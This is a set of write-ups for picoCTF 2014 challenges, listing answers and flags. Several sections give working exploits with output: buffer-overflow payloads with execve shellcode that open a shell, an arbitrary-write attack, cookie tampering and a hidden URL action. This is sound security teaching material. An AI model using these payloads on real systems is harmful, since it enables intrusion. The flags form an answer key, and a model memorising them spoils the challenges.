
Hello! Today I'm going to write simple writeups (without the reasoning) to wrap up what I've solved in picoCTF 2014. Please feel free to ask about specific problems or the reasoning behind them in the comments. Hope you enjoy.


Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? 
0x912d2e43=2435657283


No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

In Chrome, right-click the page and click Inspect Element:

"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"



Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.
Go to https://cve.mitre.org and search for the keyword 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Plug in a few of the CVEs that come up; the answer is CVE-2014-1542.


Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha


Go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript, enter the message and click "Break code!".


thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy


The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)
Each triple is (paragraph #, line #, word # from the left side); together they make up "the flag is Ceremonial plates".


Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?
Open Google Chrome, go to Inspect Element, and open the tab on the gridded bit of the website -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08


RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?
Go to Google Images, paste the image's URL and hit enter: The Positronic Man


This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".
0x52657663 and 0x30646521 in little endian are "\x63\x76\x65\x52" and "\x21\x65\x64\x30". Plug the values into the 'data preview' below (\x63\x76\x65\x52\x21\x65\x64\x30) and you get the values in ASCII: cveR!ed0


Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symlink the txt file to a .cow file name.


pico19855@shell:~$ cd /home/daedalus
pico19855@shell:/home/daedalus$ ls
flag.txt  hint.cow  secret1.cow  secret2.cow  supercow  supercow.c
pico19855@shell:/home/daedalus$ ./supercow secret1.cow
 ____________
< cow_text_1 >
 ------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow
pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow
 ______________
< I_LOV_BNANAS >
 --------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||


Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.



pico19855@shell:/home/daedalus$ cd /problems/grepfriend
pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *
daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6
pico19855@shell:/problems/grepfriend$



Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

Run alert(key); in your JavaScript console. (The key differs.)


The page at https://picoctf.com says: flag_3645



Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If a signed integer overflows, it wraps around and becomes negative.


pico19855@shell:~$ nc vuln2014.picoctf.com 50000
Your number is 1712058. Can you make it negative by adding a positive integer?
2145771590
Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!

Thanks for playing.
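
An added example, not from the original writeup or the challenge's source: the arithmetic behind the session above, next to an addition that rejects overflow instead of wrapping. It assumes the service adds in a 32-bit signed int, which the printed sum of -2147483648 suggests; all function names are made up for the example.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed behaviour of the service: add in 32-bit signed arithmetic and let
 * the result wrap. Done through uint32_t because signed overflow is undefined
 * in C; the conversion back wraps on gcc and clang. */
static int32_t wrapping_add(int32_t a, int32_t b)
{
    return (int32_t)((uint32_t)a + (uint32_t)b);
}

/* Smallest positive addend that pushes n (n > 0) past INT32_MAX. */
static int32_t smallest_wrapping_addend(int32_t n)
{
    return (int32_t)((int64_t)INT32_MAX - n + 1);
}

/* Hardened addition: returns 0 and stores the sum, or -1 if the sum does not
 * fit. The range test runs before the addition, so nothing ever overflows. */
static int checked_add(int32_t a, int32_t b, int32_t *out)
{
    if ((b > 0 && a > INT32_MAX - b) || (b < 0 && a < INT32_MIN - b))
        return -1;
    *out = a + b;
    return 0;
}

int main(void)
{
    int32_t n = 1712058;   /* number handed out in the session above */
    int32_t add = smallest_wrapping_addend(n);
    int32_t sum;

    printf("addend %d -> wrapped sum %d\n", (int)add, (int)wrapping_add(n, add));
    printf("checked_add: %s\n", checked_add(n, add, &sum) ? "rejected" : "ok");
    return 0;
}
```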



Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){
    unsigned *ptr;
    unsigned value;

    char key[33];
    FILE *f;

    printf("Welcome! I will grant you one arbitrary write!\n");
    printf("Where do you want to write to? ");
    scanf("%p", &ptr);
    printf("Okay! What do you want to write there? ");
    scanf("%p", (void **)&value);

    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
    *ptr = value;
    printf("Value written!\n");

    if (secret == 0x1337beef){
        printf("Woah! You changed my secret!\n");
        printf("I guess this means you get a flag now...\n");

        f = fopen("flag.txt", "r");
        fgets(key, 32, f);
        fclose(f);
        puts(key);

        exit(0);
    }

    printf("My secret is still safe! Sorry.\n");
}
pico19855@shell:/home/write_right$ gdb -q write_right
Reading symbols from write_right...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x080485cd <+0>: push   %ebp
<cont..>
   0x0804865b <+142>: movl   $0x8048831,(%esp)
   0x08048662 <+149>: call   0x8048470 <puts@plt>
   0x08048667 <+154>: mov    0x804a03c,%eax //address of variable 'secret' - overwrite this.
   0x0804866c <+159>: cmp    $0x1337beef,%eax
<cont...>
   0x080486fc <+303>: call   0x8048460 <__stack_chk_fail@plt>
   0x08048701 <+308>: leave
   0x08048702 <+309>: ret
End of assembler dump.
(gdb) x/wx 0x804a03c
0x804a03c <secret>: 0xdeadbeef
(gdb) q
pico19855@shell:/home/write_right$ ./write_right
Welcome! I will grant you one arbitrary write!
Where do you want to write to? 0x804a03c
Okay! What do you want to write there? 1337beef
Writing 0x1337beef to 0x804a03c...
Value written!
Woah! You changed my secret!
I guess this means you get a flag now...
arbitrary_write_is_always_right
pico19855@shell:/home/write_right$



Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.
#define _GNU_SOURCE   /* for setresgid() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* getegid(), setresgid() */

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void vuln(char *input){
    char buf[16];
    int secret = 0;
    strcpy(buf, input);   /* unbounded copy: the overflow this problem is about */

    if (secret == 0xc0deface){
        give_shell();
    }else{
        printf("The secret is %x\n", secret);
    }
}

int main(int argc, char **argv){
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}

pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl -e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical



Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...
Look at the URL of any button: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights
Change it to http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc



ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password? 
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python

import sys

"""
Daedalus Corporation encryption script.
"""

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)
    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()
    input_data = open(sys.argv[2], 'r').read()
    result_data = ""
    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()
    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

//Actually, I kinda got mixed up here, so (I don't remember his name) thanks to the anonymous admin who made this prob. Helped a lot :)

Solution:

#!/usr/bin/python

input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

# The key derived in ZOR.py is a single byte, so try all 256 values.
for key in range(0, 256):
    result = xor(input_data, key)
    print(result + "\n")


output:
<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE
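
An added example, not part of the original writeup: ZOR.py folds the whole password into a single byte, so the key space is only 256 values, and the right candidate can be picked automatically instead of reading 256 lines. This C port uses the ciphertext from the script above; the function names and the letters-and-spaces scoring rule are assumptions of the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Ciphertext copied from the solution script above (quotes escaped for C). */
static const char CT[] =
    "Vjkq\"ogqqceg\"kq\"dmp\"Fcgfcnwq\"Amprmpcvkml\"mln{,\"Mwp\"`nwgrpklvq\"dmp\""
    "vjg\"A{`mpe\"cpg\"rpmvgavgf\"ukvj\"c\"rcqqumpf,\"Vjcv\"rcqqumpf\"kq\""
    ":da0c251dc0gfffcd:f6a6`ca4c:`g";

/* Key derivation from ZOR.py: every password folds down to one byte. */
static unsigned char zor_key(const char *password)
{
    unsigned char key = 0;
    for (; *password; password++)
        key ^= (unsigned char)((2 * (unsigned char)*password + 3) & 0xff);
    return key;
}

/* Score a candidate key: -1 if any byte decrypts to a non-printable
 * character, otherwise the number of letters and spaces produced. */
static int score_key(const char *ct, size_t n, unsigned char key)
{
    int score = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char p = (unsigned char)ct[i] ^ key;
        if (!isprint(p))
            return -1;
        if (isalpha(p) || p == ' ')
            score++;
    }
    return score;
}

/* Try all 256 keys; return the best-scoring one, or -1 if none is printable. */
static int recover_key(const char *ct, size_t n)
{
    int best = -1, best_score = -1;
    for (int k = 0; k < 256; k++) {
        int s = score_key(ct, n, (unsigned char)k);
        if (s > best_score) { best_score = s; best = k; }
    }
    return best;
}

/* XOR every byte with the key; out must hold n + 1 bytes. */
static void zor_decrypt(const char *ct, size_t n, unsigned char key, char *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (char)((unsigned char)ct[i] ^ key);
    out[n] = '\0';
}

int main(void)
{
    char pt[sizeof CT];
    int key = recover_key(CT, strlen(CT));
    zor_decrypt(CT, strlen(CT), (unsigned char)key, pt);
    printf("key=0x%02x\n%s\n", key, pt);
    return 0;
}
```

Because the fold is an XOR, any repeated pair of characters cancels out, so many different passwords produce the same key byte.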



Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv


I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind  


you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know  you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name  you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew  have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind  come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth  the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends  how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon  for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind  you can own the earth and still all youll own is earth until you can paint with all the colors of the wind



Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?
chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem
--2014-11-24 10:48:49--  https://picoctf.com/problem-static/reversing/function-address/problem
Resolving picoctf.com (picoctf.com)... 54.83.62.93
Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7266 (7.1K) [application/octet-stream]
Saving to: `problem'

100%[=====================================================================================>] 7,266       --.-K/s   in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls
problem
chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem
chanbin@ubuntu:~/ctf/pico2014$ ./problem
Bet you can't find the address of find_string!
Did you know that "class" appears in "the following class" at index 14?
chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem
Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.
(gdb) p find_string
$1 = {<text variable, no debug info>} 0x8048444 <find_string>
(gdb)


Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?
My first reaction: Omg plz why why at&t
I hand-calculated it. Some people were asking me for hints for this specific question, I just told them if I was able to do this, everyone else could.

Snippet.txt
# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm
# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce
# AT&T syntax by default.

MOV $3187,%ebx      # ebx = 3187
MOV $26953,%eax     # eax = 26953
MOV $19902,%ecx     # ecx = 19902
CMP %eax,%ebx       # compare ebx with eax
JL L1               # jump to L1 if ebx < eax
JMP L2              # else jump to L2

L1:
IMUL %eax,%ebx      # ebx = eax*ebx, ebx = 85899211
ADD %eax,%ebx       # ebx += eax, ebx = 85926164
MOV %ebx,%eax       # eax = ebx, eax = 85926164
SUB %ecx,%eax       # eax -= ecx, eax = 85906262
JMP L3              # go to L3

L2:
IMUL %eax,%ebx      # ebx = eax*ebx
SUB %eax,%ebx       # ebx -= eax
MOV %ebx,%eax       # eax = ebx
ADD %ecx,%eax       # eax += ecx

L3:
NOP



Delicious! - 60

You have found the administrative control panel for the Daedalus Corporation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?
I used the Google Chrome extension EditThisCookie. Your session is stored in the cookie value <session_id>. Change it to a number from 1 to 50 (I'd recommend 50), and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.
We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards. 

Today's secret Daedalus code is: session_cookies_are_the_most_delicious



Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.
shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symbols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <give_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl -e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great




Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.
TBH: I have no memories of solving this (I remember asking about it tho,) I think I had used a more "professional" way when I first solved it but since the password is hardcoded(the hint) I just cat the program.

<gibberish>

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

<gibberish>

pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test
______  
_ _ _____
| _ \ | | | | / __ \
| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __
| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \
| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) |
|___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/
| |
|_|
Password: 2manyHacks_Debug_Admin_Test
Authorization successful.
403-shutdown-for-what



No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at /home/no_overflow/ on the shell server. The source can be found here.

How to find where the return address is: start with about 260 bytes and work your way up until EIP gets changed. Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended).


The program limits the length you enter. However, the check is a signed comparison, so if you use a negative number it won't notice, and read() then won't set a limit on your input either.

Don't forget to run ulimit -c unlimited so that a core file gets created.

pico19855@shell:~$ cat no_overflow.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE 256
void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);
    printf("Hello, %s\n!", buf);
}
void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}
int main(int argc, char **argv){
    int length;
    be_nice_to_people();
    puts("How long is your name?");
    scanf("%d", &length);
    if(length < BUFSIZE) //don't allow buffer overflow
        greet(length);
    else
        puts("Length was too long!");
}
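
An added example, not part of the original writeup or the challenge: why the signed length check above accepts -1, what read() then receives as its count, and a hardened version of greet(). mem_read() and greet_hardened() are hypothetical names, and the input is read from memory rather than from fd 0 so the example runs on its own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 256

/* Check as written in no_overflow.c: a signed comparison, so -1 passes. */
static int original_check(int length)
{
    return length < BUFSIZE;
}

/* read(2) takes its count as size_t; this is the value it receives. */
static size_t count_passed_to_read(int length)
{
    return (size_t)length;
}

/* Stand-in for read(0, ...) over an in-memory input (hypothetical helper). */
static size_t mem_read(const char *src, size_t avail, char *dst, size_t count)
{
    size_t n = count < avail ? count : avail;
    memcpy(dst, src, n);
    return n;
}

/* Hardened greet(): rejects negative and oversized lengths, keeps one byte
 * for the terminator and terminates the buffer before it is used with %s.
 * Returns the number of name bytes, or -1 if the length is rejected. */
static int greet_hardened(const char *input, size_t avail, int length,
                          char *out, size_t out_size)
{
    char buf[BUFSIZE];
    if (length < 0 || length >= BUFSIZE)
        return -1;
    size_t n = mem_read(input, avail, buf, (size_t)length);
    buf[n] = '\0';
    snprintf(out, out_size, "Hello, %s!\n", buf);
    return (int)n;
}

int main(void)
{
    char big[400], msg[BUFSIZE + 16];
    memset(big, 'A', sizeof big);   /* constructed oversized input */
    printf("original check accepts -1: %d, read() count: %zu\n",
           original_check(-1), count_passed_to_read(-1));
    printf("hardened, length -1:  %d\n",
           greet_hardened(big, sizeof big, -1, msg, sizeof msg));
    printf("hardened, length 255: %d\n",
           greet_hardened(big, sizeof big, 255, msg, sizeof msg));
    return 0;
}
```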

pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                                                                    €莽咽œ昶苔ƒ嚆

 

Segmentation fault (core dumped)

pico19855@shell:~$ gdb -q -c core

[New LWP 5132]

Core was generated by `./no_overflow'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0xffffd6c5 in ?? ()

(gdb) x/40wx $esp-200

0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb) 

0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68

0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f

0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c

0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b

0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000

0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c

0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734


0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000

0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a

(gdb) q


pico19855@shell:~$ cd /home/no_overflow

pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

    are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/bin‰PS‰嘯

                                                                       €莽擎|昶苔ƒ嚆

ls

Makefile  core flag.txt  no_overflow  no_overflow.c

cat flag.txt

what_is_your_sign

